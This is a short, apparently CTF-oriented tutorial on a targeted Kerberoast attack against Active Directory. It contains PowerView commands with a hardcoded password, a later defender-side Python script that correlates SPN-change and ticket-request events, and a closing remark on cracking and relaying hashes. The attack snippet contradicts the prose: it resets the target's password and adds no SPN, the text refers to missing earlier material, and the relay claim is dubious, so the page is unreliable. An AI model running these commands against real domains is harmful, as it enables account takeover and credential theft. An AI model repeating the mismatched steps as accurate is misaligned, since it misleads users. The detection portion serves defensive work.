Targeted Kerberoast


Source: The-Hacker-Recipes.

This attack requires a controlling object that has WriteProperty, GenericWrite, or GenericAll over a target user.

How To Perform a Targeted Kerberoast!

The attacker can add a Service Principal Name (SPN) to the target account. Once the account has an SPN, it can be Kerberoasted as mentioned above. To achieve this, Set-DomainObject and Get-DomainSPNTicket from PowerView can be used.

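# Dot-source PowerView so its functions are available in this session
. .\PowerView.ps1
# Build a PSCredential for administrator.htb\benjamin ($Cred is not passed to any call below)
$SecPassword = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\benjamin', $SecPassword)
# New password for the account, as a SecureString
$UserPassword = ConvertTo-SecureString 'Password123' -AsPlainText -Force
# Reset benjamin's password; this call does not modify servicePrincipalName
Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword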
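
From the defender's side, the SPN write described above leaves a directory-change event (5136) on a user object, followed by a service ticket request (4769) for that same account. The following is an added example, not code from the original page or from PowerView: it correlates the two over constructed sample events. The account names olivia and emily, the SPN value, the 30-minute window, and the CN-equals-sAMAccountName mapping are assumptions.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)  # assumed correlation window
VALUE_ADDED = "%%14674"         # 5136 OperationType meaning "Value Added"
RC4_HMAC = "0x17"               # 4769 TicketEncryptionType for RC4-HMAC

def ev(eid, time, **fields):
    return {"id": eid, "time": datetime.fromisoformat(time), **fields}

# Constructed sample events; field names follow Security events 5136 and 4769.
EVENTS = [
    ev(5136, "2024-05-01T10:00:00", SubjectUserName="olivia", ObjectClass="user",
       ObjectDN="CN=benjamin,CN=Users,DC=administrator,DC=htb",
       AttributeLDAPDisplayName="servicePrincipalName",
       AttributeValue="http/constructed-spn", OperationType=VALUE_ADDED),
    ev(4769, "2024-05-01T10:00:20", TargetUserName="olivia@ADMINISTRATOR.HTB",
       ServiceName="benjamin", TicketEncryptionType=RC4_HMAC),
    ev(5136, "2024-05-01T10:05:00", SubjectUserName="WS01$", ObjectClass="computer",
       ObjectDN="CN=WS01,CN=Computers,DC=administrator,DC=htb",
       AttributeLDAPDisplayName="servicePrincipalName",
       AttributeValue="HOST/WS01", OperationType=VALUE_ADDED),
    ev(4769, "2024-05-01T11:30:00", TargetUserName="emily@ADMINISTRATOR.HTB",
       ServiceName="benjamin", TicketEncryptionType="0x12"),
]

def account_of(dn):
    # Assumption: the object's CN equals its sAMAccountName (no escaped commas).
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def find_spn_add_then_ticket(events, window=WINDOW):
    """Flag a TGS request for a user account whose SPN was added shortly before."""
    recent_adds, alerts = {}, []
    for e in sorted(events, key=lambda x: x["time"]):
        if (e["id"] == 5136 and e["ObjectClass"] == "user"
                and e["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"
                and e["OperationType"] == VALUE_ADDED):
            recent_adds[account_of(e["ObjectDN"])] = e  # remember the latest SPN add
        elif e["id"] == 4769:
            add = recent_adds.get(e["ServiceName"].lower())
            if add and e["time"] - add["time"] <= window:
                alerts.append({"account": e["ServiceName"].lower(),
                               "spn_added_by": add["SubjectUserName"],
                               "ticket_requested_by": e["TargetUserName"],
                               "rc4": e["TicketEncryptionType"] == RC4_HMAC})
    return alerts

if __name__ == "__main__":
    for alert in find_spn_add_then_ticket(EVENTS):
        print(alert)
```

Event 5136 is only logged when directory service change auditing is enabled and the object carries a matching SACL, so the correlation depends on that audit policy being in place.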

Targeted Kerberoast Limitations

These hashes cannot be used for pass-the-hash, but they are crackable and can be relayed :)